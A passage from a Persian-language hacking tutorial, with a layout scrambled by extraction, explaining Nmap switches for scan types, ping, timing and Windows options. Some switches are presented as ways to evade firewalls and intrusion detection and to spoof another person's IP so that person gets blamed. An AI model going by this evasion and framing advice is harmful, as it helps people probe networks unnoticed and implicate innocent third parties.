‫ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫ﻧﻮع ﻣﺨﺼﻮﺻﯽ از ﻣﮑﺎﻧﻴﺰم ﺏﺮای ویﻨﺪوز اﺱﺖ ﮐﻪ در‬ ‫ایﻦ ﻣﮑﺎﻧﻴﺰم ﻣﺸﺎﺏﻪ ‪ SYS ACK‬اﺱﺖ ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ‬ ‫ﻓﻴﻠﺪ ‪ Window Size‬در ﺏﺴﺘﻪ ‪ TCP‬اﺱﺘﻔﺎدﻩ ﺷﺪﻩ‬ ‫اﺱﺖ‪.‬‬ ‫ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ ﺱﺮویﺲ ‪ RPC‬در ﺷﺒﮑﻪ‪ ).‬ایﻦ ﻣﮑﺎﻧﻴﺰم‬ ‫} ﺧﻮدش از ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ {‬ ‫ﮐﻠﻴﻪ ﭘﻮرت هﺎی ﺏﺎز و ﺁﻣﺎدﻩ اﺱﺘﻔﺎدﻩ از ﺱﺮویﺲ ‪RPC‬‬ ‫ﮐﻪ اﺻﻄﻼﺡﺎ ‪ port mapper‬را ﺏﻌﻼوﻩ اﻃﻼﻋﺎت‬ ‫ﺕﮑﻤﻴﻠﯽ ﺁﺷﮑﺎر ﻣﻴﮑﻨﺪ (‬ ‫ﺧﻮب ایﻦ ﮔﺰیﻨﻪ را ﻣﻦ زیﺎد اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﻢ وﻟﯽ ﻓﮑﺮ‬ ‫ﻣﻴﮑﻨﻢ هﻤﺎن ﻋﻤﻞ ‪ Ping‬را اﻧﺠﺎم ﻣﻴﺪهﺪ ﺏﺎ اﻣﻨﻴﺖ‬ ‫ﺏﻴﺸﺘﺮ‪.‬‬ ‫ﺏﺎ ایﻦ ﮔﺰیﻨﻪ ﻟﻴﺴﺖ ﭘﻮرت هﺎی را ﮐﻪ ﺏﺎیﺪ اﺱﮑﻦ ﮐﻨﺪ‬ ‫ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻴﻢ ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ‬ ‫ﺧﻮب در ﺏﺎرﻩ ایﻦ ﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم ﮐﻪ یﮑﯽ از‬ ‫ﻣﮑﺎﻧﻴﺰﻣﻬﺎی ﻣﺨﻔﯽ ﻣﺎﻧﺪن اﺱﺖ ﮐﻪ راﺏﻄﻪ ﻣﺴﺘﻘﻴﻤﯽ ﺏﺎ‬ ‫ﭘﻬﻨﺎی ﺏﺎﻧﺪ ارﺕﺒﺎﻃﯽ ﺷﻤﺎ دارد‪ .‬ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ‬ ‫ﻣﮑﺎﻧﻴﺰم ﺷﻤﺎ یﮏ ﺱﺮی ‪ ) IP‬ﺕﺮﺟﻴﺤﺎ ‪ ( Clint‬ﭘﻴﺪا‬ ‫ﮐﺮدﻩ ) ﺏﻪ ﻣﻘﺪار ﻻزم ﻧﺴﺒﺖ ﺏﻪ ﺷﮑﻢ ﺧﻮدﺕﺎن !!!( و ﺏﻌﺪ‬ ‫از ﺱﻮیﭻ در ﻗﺎﻟﺐ ﻟﻴﺴﺘﯽ ﮐﻪ اﻗﻼم ﺏﻪ وﺱﻴﻠﻪ یﮏ ﻋﻼﻣﺖ‬ ‫ﻣﺒﺎرﮐﻪ ﮐﺎﻣﺎ از یﮑﺪیﮕﺮ ﺟﺪا ﺷﺪﻩ اﻧﺪ ذﮐﺮ ﻣﯽ ﮐﻨﻴﺪ‪.‬‬ ‫ﺧﻮب درﺏﺎرﻩ ایﻦ ﮐﻪ ﺧﻴﻠﯽ ﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم هﻤﺎن‬ ‫ﻣﮑﺎﻧﻴﺰم ﻣﺨﻔﯽ ﻣﺎﻧﺪن ‪ FTP Bounce‬اﺱﺖ ﮐﻪ ﺏﻌﺪ از‬ ‫ﺱﻮیﭻ ‪ IP‬یﺎ ‪ IP‬هﺎ را وارد ﻣﯽ ﮐﻨﻴﺪ‪.‬‬ ‫در ﻣﻮرد ﻣﻴﺰﺏﺎﻧﻬﺎی ﮐﻪ ﺏﻴﺶ از یﮏ راﺏﻂ ﺷﺒﮑﻪ را‬ ‫ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار دادﻩ اﻧﺪ ‪ ،‬اﻣﮑﺎن ﺕﻌﻴﻴﻦ راﺏﻂ ﺷﺒﮑﻪ‬ ‫ﻣﻮرد ﻧﻈﺮ را ﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﻣﻴﺰﺏﺎن در‬ ‫اﺧﺘﻴﺎر ﻣﯽ ﮔﺰارد‪ .‬اﻟﺒﺘﻪ ﺕﻌﻴﻴﻦ راﺏﻂ ﺷﺒﮑﻪ ﻣﻮرد ﻧﻈﺮ‬ ‫ﺏﻌﺪ از ﺱﻮیﭻ اﻟﺰاﻣﯽ اﺱﺖ‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﺏﻪ ﺷﻤﺎ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﺁدرس ‪ IP‬ﻣﻨﺒﻊ‬ ‫ارﺱﺎل ﮐﻨﻨﺪﻩ ﺏﺴﺘﻪ هﺎ را ﻣﺸﺨﺺ ﮐﻨﻴﺪ‪ .‬ﺷﻤﺎ ﺏﺎ ایﻦ ﺷﻴﻮﻩ‬ ‫ﻣﻴﺘﻮاﻧﻴﺪ ﻣﺜﻼ ‪ IP‬یﮑﯽ از دوﺱﺘﺎن ﺧﻮد !!! را درج ﮐﻨﻴﺪ‬ ‫ﮐﻪ اﮔﺮ یﮏ دﻓﻌﻪ اﻓﺴﺮ اوﻣﺪ ) ‪ (IDS‬ﺁن ﺏﺪ ﺏﺨﺖ ﺧﻔﺖ‬ ‫ﮐﻨﺪ ﻧﻪ ﺷﻤﺎ را ) ﻋﺠﺐ ﮐﺎر ﮐﺜﻴﻒ و ﭘﻠﻴﺪی (‪.‬اﻧﺸﺎاﷲ ﺧﺪا‬ ‫ﻣﻦ ﺏﺒﺨﺸﺪ ﺏﻪ ﺧﺎﻃﺮ ﺁﻣﻮزش دادن ایﻦ ﭼﻴﺰهﺎ ﺏﻪ ﻣﻠﺖ‪.‬‬ ‫ایﻦ اﺽﺎﻓﻪ ﮐﻨﻢ ایﻦ ﺷﻴﻮﻩ در ﻣﻮرد ﻣﻴﺰﺏﺎن هﺎیﯽ ﮐﻪ ﭼﻨﺪ‬ ‫اﺕﺼﺎل ﺷﺒﮑﻪ دارﻧﺪ زیﺎد ﮐﺎرایﯽ ﻧﺪارد ﭼﺮا ﺁن را‬ ‫ﺧﻮدﺕﺎن ﮐﺸﻒ ﮐﻨﻴﺪ اﻧﺸﺎاﷲ " ﻓﻴﻞ ‪ ،‬ﺱﻮف " ﺏﺸﻮیﺪ‪ .‬ایﻦ‬ ‫اﺽﺎﻓﻪ ﮐﻨﻢ ﮐﻪ ﮔﺰارش ﺡﺎﺻﻞ از ﻋﻤﻠﻴﺎت ﺏﻪ دﺱﺖ ﺷﻤﺎ‬ ‫ﻧﻤﯽ رﺱﺪ ‪ ،‬ﮐﻪ ﺏﺎیﺪ یﮏ ﮐﻤﯽ ﻣﺦ ﺏﮕﺰاریﺪ ایﻦ وﺱﻂ ﺕﺎ‬ ‫ﺟﻮاب ﭘﻮیﺶ را ﺏﺪﺱﺖ ﺏﯽ ﺁوریﺪ‪.‬اﮔﺮ از ایﻦ ﻣﺦ هﺎ‬ ‫ﻧﺪاریﺪ ﻣﻴﺘﻮاﻧﻴﺪ ایﻦ ﮐﺎر را اﻧﺠﺎم دهﻴﺪ ﺕﺎ ﺷﺨﺺ دیﮕﺮی‬ ‫را ﮔﻨﺎﻩ ﮐﺎر ﺟﻠﻮﻩ دهﻴﺪ!!‬ ‫ﻋﺠﺐ ﺁدم ﭘﺴﺖ ﻣﻴﺸﻮد ﮔﺎهﯽ ‪.‬‬

‫ﻗﺴﻤﺖ ‪ Scan‬ﺏﺨﺶ ‪Scan Options‬‬

‫‪١١‬‬

‫‪-sW‬‬

‫‪Window Scan‬‬

‫ﺻﻔﺤﻪ‬

‫‪٣٣‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢١‬‬

‫} ‪{ –PT –PI‬‬

‫‪TCP + ICMP‬‬

‫‪٢٢‬‬ ‫‪٢٣‬‬

‫‪-PI‬‬ ‫‪-P0‬‬

‫‪ICMP Ping‬‬ ‫‪Don’t Ping‬‬

‫‪٢۴‬‬

‫‪-f‬‬

‫‪Fragmentation‬‬

‫‪٢۵‬‬

‫‪-I‬‬

‫‪Get Idented Info‬‬

‫‪٢۶‬‬

‫‪-R‬‬

‫‪Resolve All‬‬

‫‪٢٧‬‬

‫‪-n‬‬

‫‪Do not Resolve‬‬

‫‪٢٨‬‬ ‫‪٢٩‬‬

‫‪-F‬‬ ‫‪-O‬‬

‫‪Fast Scan‬‬ ‫‪OS Detection‬‬

‫‪٣٠‬‬

‫‪-iR‬‬

‫‪Random Host‬‬

‫‪٣١‬‬

‫‪--resume‬‬

‫‪Resume‬‬

‫ایﻦ ﺱﻮیﭻ ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ یﮑﯽ از ﻣﮑﺎﻧﻴﺰﻣﻬﺎی‬ ‫ﭘﻨﻬﺎﻧﯽ ﺧﻮد ) ﺷﻤﺎرﻩ هﺎی ‪ ٢‬یﺎ ‪ ٣‬یﺎ ‪ ۶‬یﺎ ‪ ( ٧‬ﺟﻬﺖ‬ ‫ﭘﻮیﺶ اﺱﺘﻔﺎدﻩ ﮐﻨﺪ ‪ .‬اﻟﺒﺘﻪ هﺮ ﮐﺪام از ایﻦ ‪ ۴‬ﻣﮑﺎﻧﻴﺰم‬ ‫درون ﭘﺮاﻧﺘﺰ را ﺏﻪ ﺻﻮرت ﺏﺴﺘﻪ هﺎی ‪ IP‬ﻣﻨﻔﺼﻞ ﺏﻪ‬ ‫هﻤﺮاﻩ " هﺪر " ‪ TCP ،‬ﺕﮑﻪ ﺕﮑﻪ ﺷﺪﻩ ﻣﻮرد اﺱﺘﻔﺎدﻩ‬ ‫ﻗﺮار ﻣﻴﺪهﺪ‪ .‬ایﻦ ﮐﺎر ﺏﺮای ﭘﻴﺸﮕﻴﺮی از ﺏﻠﻮﮐﻪ ﺷﺪن‬ ‫ﺏﺴﺘﻪ هﺎی ﻣﻮرد ﻧﻈﺮ ﺕﻮﺱﻂ دیﻮار اﺕﺶ و یﺎ ﺁﻗﺎ دزد‬ ‫ﮔﻴﺮ )ﺱﻴﺴﺘﻤﻬﺎی ﮐﺸﻒ ﺕﻬﺎﺟﻢ ‪ (IDS‬اﻧﺠﺎم ﻣﻴﺸﻮد‪.‬‬ ‫اﮔﺮ از ﻣﮑﺎﻧﻴﺰم ‪ –sT‬اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ یﮏ ﺱﺮی اﻃﻼﻋﺎت‬ ‫اﺽﺎﻓﯽ هﻢ ﺏﺮای ﺷﻤﺎ ﺟﻤﻊ ﺁوری ﻣﻴﮑﻨﺪ ﮐﻪ اﻟﺒﺘﻪ ﻋﺎﻟﯽ‬ ‫ﻧﻴﺰ هﺴﺘﻨﺪ‪.‬‬ ‫در ﻣﻮﻗﻌﯽ ﮐﻪ یﮏ رﻧﺞ ‪ IP‬را ﺏﺮای ﭘﻮیﺶ ﺏﻪ ﺁن‬ ‫ﻣﻴﺪهﻴﺪ ﺏﻪ ﻃﻮر ﭘﻴﺶ ﻓﺮض روی ‪ IP‬هﺎی ﮐﻪ ﺟﻮاب‬ ‫ﻣﻴﺪهﻨﺪ دﻧﺒﺎل ‪ DNS‬ﺁن هﺎ ﻣﻴﮕﺮدد اﮔﺮ ایﻦ را اﻧﺘﺨﺎب‬ ‫ﮐﻨﻴﺪ روی ‪ IP‬هﺎی هﻢ ﮐﻪ ﺟﻮاب ﻧﻤﯽ دهﻨﺪ هﻢ ایﻦ ﮐﺎر‬ ‫را اﻧﺠﺎم ﻣﻴﺪهﺪ !!‬ ‫ﺧﻮب ایﻦ اﻣﮑﺎن ﭘﻴﺶ ﻓﺮض ﺏﺎﻻی را از ﮐﺎر ﻣﻴﺎﻧﺪازد‬ ‫یﻌﻨﯽ روی ‪ IP‬هﻢ ﮐﻪ ﺟﻮاب ﻣﻴﺪهﻨﺪ دﻧﺒﺎل اﺱﻢ ‪DNS‬‬ ‫هﻢ ﻧﻤﻴﮕﺮدد‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﻓﻘﻂ ﭘﻮرت هﺎی ﻣﺸﻬﻮر را اﺱﮑﻦ ﻣﻴﮑﻨﺪ‬ ‫ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﺱﻴﺴﺘﻢ‬ ‫ﻋﺎﻣﻞ روی ﻣﺎﺷﻴﻦ هﺪف را ﮐﺸﻒ ﮐﻨﺪ‪.‬‬ ‫اﻣﮑﺎن اﻧﺘﺨﺎب ﺕﺼﺎدﻓﯽ ﻣﻴﺰﺏﺎن هﺎی ﻣﻮرد ﻧﻈﺮ را از‬ ‫ﻟﻴﺴﺘﯽ ﮐﻪ ﺷﺎﻣﻞ ایﻦ اﺱﺎﻣﯽ اﺱﺖ ﮐﻪ ﺷﻤﺎ ﺏﻪ ﺏﺮﻧﺎﻣﻪ‬ ‫ﻣﻴﺪهﻴﺪ را دارا ﻣﻴﺒﺎﺷﺪ !!‬ ‫در ﺻﻮرت ﻟﻐﻮ ﻋﻤﻠﻴﺎت ﭘﻮیﺶ ) ﺏﺎ اﺱﺘﻔﺎدﻩ از‬ ‫‪ (CTRL-C‬اﮔﺮ ایﻦ را ﻓﻌﺎل ﮐﺮدﻩ ﺏﺎﺷﻴﺪ ﺏﺎ ﺕﻌﻴﻴﻦ ﻧﺎم‬ ‫ﻓﺎیﻞ ﻣﻮرد ﻧﻈﺮ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺘﺎیﺞ را ﻣﺸﺎهﺪﻩ ﮐﻨﻴﺪ‪.‬‬

‫ﻗﺴﻤﺖ و ﺏﺨﺶ ‪Discover‬‬

‫‪٢٠‬‬

‫‪-PT‬‬

‫‪TCP Ping‬‬

‫ایﻦ ﮔﺰیﻨﻪ ‪ Nmap‬را وادار ﻣﻴﮑﻨﺪ از ﺷﻴﻮﻩ ای ﺏﻪ‬ ‫ﻋﻨﻮان ‪ TCP Ping‬ﺏﺮای ﻋﻤﻞ ‪ ping‬اﺱﺘﻔﺎدﻩ ﮐﻨﺪ‪ .‬ایﻦ‬ ‫ﺷﻴﻮﻩ ﮐﺎﻣﻼ ﻣﺸﺎﺏﻪ ﻋﻤﻞ ‪ Telnet‬اﺱﺖ و ﭘﻮرت ﭘﻴﺶ‬ ‫ﻓﺮض هﻢ ‪ ٨٠‬اﺱﺖ‪ .‬در ﺻﻮرت ایﻨﮑﻪ ﭘﻮرت ﻣﻮرد‬ ‫ﻧﻈﺮ را ﺏﺨﻮاهﻴﺪ ﺕﻐﻴﻴﺮ دهﻴﺪ ﺏﺎیﺪ ﺷﻤﺎرﻩ ﺁن را ﺏﻌﺪ از‬ ‫ﺱﻮیﭻ وارد ﮐﻨﻴﺪ‪.‬‬ ‫ﺱﻮیﭻ ﻣﺸﺎﺏﻪ ﺁن در ﻟﻴﻨﻮﮐﺲ هﺎ ‪ –PB‬اﺱﺖ ﮐﻪ از هﺮ‬ ‫دو ﺷﻴﻮﻩ هﻤﺮاﻩ هﻢ اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫در ایﻦ ﺷﻴﻮﻩ از ﭘﻴﻐﺎم ‪ ICMP‬اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد‪.‬‬ ‫ﺏﺎ اﻧﺘﺨﺎب اﺏﻦ ﮔﺰیﻨﻪ از اﻧﺠﺎم ﻋﻤﻞ ‪ Ping‬ﺧﻮد داری‬ ‫ﻣﻴﮑﻨﺪ در ﻧﺘﻴﺠﻪ ﺏﺮﻧﺎﻣﻪ ﺏﺪون داﻧﺴﺘﻦ ایﻨﮑﻪ اﺻﻞ ﺁن ‪IP‬‬ ‫ﺏﺎﻻ هﺴﺖ یﺎ ﻧﻪ ایﻦ ﮐﺎر) ﭘﻮیﺶ ﭘﻮرت( را اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬

‫ﻗﺴﻤﺖ و ﺏﺨﺶ ‪Option‬‬

‫‪١٩‬‬

‫}‪-g {x‬‬

‫‪Source Port‬‬

‫ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺱﻮیﭻ اﻣﮑﺎن ﺕﻌﻴﻴﻦ ﭘﻮرت ﻣﻨﺒﻌﯽ ﮐﻪ‬ ‫ﮐﻠﻴﻪ ﻋﻤﻠﻴﺎت اﺱﮑﻦ ﺕﻮﺱﻂ ایﻦ ﺏﺮﻧﺎﻣﻪ از ﺁن ﺟﺎ اﻧﺠﺎم‬ ‫ﻣﻴﺸﻮد ‪ ،‬در اﺧﺘﻴﺎر ﻗﺮار ﻣﻴﮕﻴﺮد‪ .‬ﺏﻨﺎﺏﺮایﻦ ذﮐﺮ ﺷﻤﺎرﻩ‬ ‫ﭘﻮرت ﻣﺰﺏﻮر ﺏﻌﺪ از ایﻦ ﮔﺰیﻨﻪ اﻟﺰاﻣﯽ اﺱﺖ ‪ ).‬در‬ ‫ﺏﺮﺧﯽ ﻣﻮارد ﮐﻪ دیﻮار ﺁﺕﺶ ﻣﮕﺲ ﮐﺎر ﻣﻴﺸﻮد و‬ ‫ﻋﻤﻠﻴﺎت ﻣﺎ را هﯽ ﻧﺎﮐﺎم ﻣﯽ ﮔﺰارد ایﻦ ﮔﺰیﻨﻪ ﻓﻮق‬ ‫اﻟﻌﺎدﻩ اﺱﺖ و ﺕﻌﻴﻴﻦ یﮑﯽ از ﭘﻮرت هﺎ ﻣﻌﺮوف ﻣﺜﻞ‬ ‫‪ ٨٠‬و ‪ ٢٠‬و " ‪ " UDP ۵٣‬ﺁن راﻩ ﮔﺸﺎ اﺱﺖ (‬

‫‪٣٤‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫‪۴٢‬‬

‫}‪--max_rtt_timeout {X‬‬

‫‪۴٣‬‬

‫}‪--max_parallelism {X‬‬

‫‪۴۵‬‬

‫}‪--min_rtt_timeout {X‬‬

‫‪۴۶‬‬

‫}‪--initial_rtt_timeout {X‬‬

‫‪۴٧‬‬

‫}‪--scan_delay {X‬‬

‫‪۴٨‬‬

‫"ﻣﺴﻴﺮ ﻓﺎیﻞ" ‪-iL‬‬

‫‪۴٩‬‬

‫"ﻣﺴﻴﺮ ﻓﺎیﻞ" ‪-oN‬‬

‫‪۵٠‬‬

‫‪--win_nopcap‬‬

‫‪No Pcap‬‬

‫‪۵١‬‬

‫‪--win_trace‬‬

‫‪winTrace‬‬

‫‪۵٢‬‬

‫‪--win_noiphlpapi‬‬

‫‪No IP Hlp Api‬‬

‫‪۵٣‬‬

‫‪--win_norawsock‬‬

‫‪No Raw Sockets‬‬

‫‪۵۴‬‬

‫‪--win_forcerawsock‬‬

‫‪Force Raw Socket‬‬

‫‪۵۵‬‬

‫‪--win_nt4route‬‬

‫‪NT4 Route‬‬

‫از ﺕﻮاﺏﻊ ‪ Pcap‬دیﮕﺮ اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﺪ !!! ﺏﻪ ﺟﺎی ﺁن‬ ‫از ﺕﻮاﺏﻊ ‪ Socket Raw‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺧﻮب اﮔﺮ ﺷﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﻗﺮﺏﺎﻧﯽ از ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﺎی‬ ‫ﻣﺎیﮑﺮوﺱﺎﻓﺖ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ﺏﺎ اﻧﺘﺨﺎب ایﻦ ﮔﺰیﻨﻪ یﮏ‬ ‫ﮐﻤﯽ اﻃﻼﻋﺎت ﺏﻴﺸﺘﺮی ﺏﺮای ﺷﻤﺎ دﺱﺖ ﭘﺎ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﻣﺜﻞ ﮔﺰیﻨﻪ ﺏﺎﻻ اﺱﺖ وﻟﯽ ﺏﺮای هﺮ ﺏﺴﺘﻪ ﻓﻘﻂ ‪ ١۵‬ﺙﺎﻧﻴﻪ‬ ‫ﺏﻴﺸﺘﺮ ﻣﻨﺘﻈﺮ ﺟﻮاب ﻧﻤﻴﺸﻮد‪.‬‬ ‫ﺏﺎ اﻧﺘﺨﺎب ایﻦ ﮔﺰیﻨﻪ ﺕﻮاﺏﻊ ‪ Raw Sockets‬هﻢ اﺱﺘﻔﺎدﻩ‬ ‫ﻧﻤﯽ ﺷﻮد‪.‬‬ ‫ﺧﻮب ایﻦ ﮔﺰیﻨﻪ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﻓﻘﻂ ﺕﻮاﺏﻊ ‪Raw‬‬ ‫‪ Socket‬اﺱﺘﻔﺎدﻩ ﺷﻮد‪.‬‬ ‫ﺁزﻣﺎیﺶ ﻣﻴﮑﻨﺪ ﮐﺪ هﺎی ﻣﺴﻴﺮ یﺎب ‪ NT4‬را‪.‬هﻤﻴﻦ!!‬

‫ﻗﺴﻤﺖ ‪Option‬‬ ‫ﺏﺨﺶ ‪Debug‬‬

‫‪٣٩‬‬ ‫‪۴٠‬‬ ‫‪۴١‬‬

‫‪-T 4‬‬ ‫‪-T 5‬‬ ‫}‪--host_timeout –{X‬‬

‫ﻗﺴﻤﺖ ‪ Timing‬ﺏﺨﺶ‬ ‫‪Throttle‬‬

‫‪٣۶‬‬ ‫‪٣٧‬‬ ‫‪٣٨‬‬

‫‪-T 1‬‬ ‫‪-T 2‬‬ ‫‪-T 3‬‬

‫‪ Throttle Paranoid‬ﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم ایﻦ ‪ ۶‬را ‪ ،‬وﻟﯽ ﺏﺎزم ﻣﻴﮕﻢ‪.‬هﺮ ﭘﻨﺞ ‪۵‬‬ ‫دﻗﻴﻘﻪ یﮏ ﺏﺴﺘﻪ ارﺱﺎل ﻣﻴﺸﻮد‪.‬‬ ‫هﺮ ﭘﺎﻧﺰدﻩ ‪ ١۵‬ﺙﺎﻧﻴﻪ یﮏ ﺏﺴﺘﻪ ﻣﯽ ﻓﺮﺱﺘﺪ‪.‬‬ ‫‪Throttle Sneaky‬‬ ‫هﺮ‪ ٠٫۴‬یﮏ ﺏﺴﺘﻪ ﻣﻴﻔﺮﺱﺘﺪ‪.‬‬ ‫‪Throttle Polite‬‬ ‫ارﺱﺎل ﺏﺎ ﺡﺪاﮐﺜﺮ ﺱﺮﻋﺖ ﻣﻤﮑﻦ ‪ ،‬ﺏﮕﻮ ﻧﻪ ای ﮐﻪ هﻴﭻ‬ ‫‪Throttle Normal‬‬ ‫ﭘﻮرت ﺁزﻣﺎیﺶ ﻧﺸﺪﻩ ای ﺏﺎﻗﯽ ﻧﻤﺎﻧﺪ‪.‬‬ ‫‪ Throttle Aggressive‬ﺏﺮای دریﺎﻓﺖ ﭘﺎﺱﺦ ‪ ١٫٢۵‬ﺙﺎﻧﻴﻪ ﺏﻴﺸﺘﺮ ﻣﻨﺘﻈﺮ ﻧﻤﻴﺸﻮد‪.‬‬ ‫ﺏﺮای دریﺎﻓﺖ ﭘﺎﺱﺦ ‪ ٠٫٣‬ﺙﺎﻧﻴﻪ ﻣﻨﺘﻈﺮ ﻣﻴﺸﻮد‪.‬‬ ‫‪Throttle Insane‬‬ ‫ایﻦ ﺱﻮیﭻ ﺡﺪاﮐﺜﺮ زﻣﺎن ﻗﺎﺏﻞ ﺻﺮف ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ‬ ‫‪Host Timeout‬‬ ‫ﺙﺎﻧﻴﻪ را ﺟﻬﺖ اﺱﮑﻦ ﭘﻮرت هﺎی یﮏ ﻣﻴﺰﺏﺎن ﺧﺎص‬ ‫ﺕﻌﻴﻴﻦ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﺡﺪاﮐﺜﺮ ﻣﺪت زﻣﺎن اﻧﺘﻈﺎر ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ‬ ‫‪Max RTT‬‬ ‫ﺙﺎﻧﻴﻪ را ﺟﻬﺖ دریﺎﻓﺖ ﭘﺎﺱﺦ ﻻزم از ﻣﻴﺰﺏﺎن ﻣﻮرد ﻧﻈﺮ‬ ‫ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻨﺪ‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﺕﻌﺪاد ﭘﻮرت هﺎیﯽ را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ ﮐﻪ ﺏﻪ‬ ‫‪Parallelism‬‬ ‫ﻃﻮر ﻣﻮازی ) یﺎ هﻢ زﻣﺎن ﺏﻪ ﻋﺒﺎرت دیﮕﺮ ( ﻣﻴﺘﻮان‬ ‫ﭘﻮیﺶ ﻧﻤﻮد‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﺡﺪاﻗﻞ ﻣﺪت زﻣﺎن اﻧﺘﻈﺎر ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ‬ ‫‪Min RTT‬‬ ‫ﺙﺎﻧﻴﻪ را ﺟﻬﺖ دریﺎﻓﺖ ﭘﺎﺱﺦ ﻻزم از ﻣﻴﺰﺏﺎن ﻣﻮرد ﻧﻈﺮ‬ ‫ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻨﺪ‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﻣﺪت زﻣﺎن ﭘﻴﺶ ﻓﺮض ﺏﺮای ایﻦ اﻧﺘﻈﺎرهﺎ‬ ‫‪Initial RTT‬‬ ‫را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪ .‬زﻣﺎن ﭘﻴﺶ ﻓﺮض ‪ ۶‬ﺙﺎﻧﻴﻪ اﺱﺖ‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﻓﺎﺻﻠﻪ زﻣﺎﻧﯽ ﻣﻮرد ﻧﻴﺎز ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ‬ ‫‪Scan Delay‬‬ ‫ﺏﻪ ﻋﻨﻮان ﺕﺎﺧﻴﺮ ﻣﻴﺎن اﺱﮑﻦ دو ﻣﻴﺰﺏﺎن ﻣﺨﺘﻠﻒ را‬ ‫ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﺏﺎ وارد ﮐﺮدن ﻓﺎیﻞ هﺎی ﺏﺎ ﻗﺎﻟﺐ ﻣﺨﺼﻮص‬ ‫‪Input File‬‬ ‫ﻣﻴﺘﻮاﻧﻴﺪ ﮐﺎر را اداﻣﻪ دهﻴﺪ و‪***. ..‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﻣﻮﺟﺐ ﺙﺒﺖ ﺕﻤﺎﻣﯽ ﺧﺮوﺟﯽ هﺎی ﺡﺎﺻﻞ از‬ ‫‪Output File‬‬ ‫ﺏﺮﻧﺎﻣﻪ در ﻗﺎﻟﺒﯽ ﮐﻪ ﺷﻤﺎ ﺏﺘﻮاﻧﻴﺪ ﻣﺸﺎهﺪﻩ ﮐﻨﻴﺪ ﻣﻴﺸﻮد‪**.‬‬

‫ﻗﺴﻤﺖ ‪ Timing‬ﺏﺨﺶ ‪Time Out‬‬

‫‪٣۵‬‬

‫‪-T 0‬‬

‫ﭘﻴﺸﺮﻓﺖ ﻋﻤﻞ ﭘﻮیﺶ ﺏﺎ ﺕﻤﺎم ﺟﺰیﻴﺎت را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬‬

‫ﻗﺴﻤﺖ‪File‬‬

‫‪٣۴‬‬

‫‪-vv‬‬

‫‪Very Verbose‬‬

‫ﺡﺎﻟﺖ اﺷﮑﺎل زدایﯽ را ﻓﻌﺎل ﻣﯽ ﮐﻨﺪ ‪.‬‬ ‫ﭘﻴﺸﺮﻓﺖ ﻋﻤﻞ ﭘﻮیﺶ ﺏﺎ ﺟﺰیﻴﺎت را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬‬

‫ﻗﺴﻤﺖ ‪ Win 32‬ﺏﺨﺶ ‪ ) Options‬زیﺎد‬ ‫ﻣﻬﻢ ﻧﻴﺴﺖ(‬

‫‪٣٢‬‬ ‫‪٣٣‬‬

‫‪-d‬‬ ‫‪-v‬‬

‫‪Debug‬‬ ‫‪Verbose‬‬

